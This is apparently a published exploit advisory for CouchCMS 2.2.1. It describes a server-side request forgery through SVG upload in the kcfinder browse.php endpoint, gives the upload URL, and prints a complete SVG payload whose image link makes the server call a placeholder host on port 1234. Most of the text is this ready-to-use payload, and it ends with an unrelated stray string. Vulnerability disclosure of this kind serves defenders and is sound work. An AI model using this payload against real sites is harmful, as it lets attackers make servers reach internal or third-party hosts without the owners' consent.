# Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload # Date: 2021-01-25 # Exploit Author: xxcdd # Vendor Homepage: https://github.com/CouchCMS/CouchCMS # Software Link: https://github.com/CouchCMS/CouchCMS # Version: v2.2.1 # Tested on: Windows 7 An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload. upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en ssrf.svg content: <?xml version="1.0" encoding="UTF-8" standalone="no"?> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns=" http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <image height="200" width="200" xlink:href="http://<test_ip>:1234" /> </svg>
体验盒子
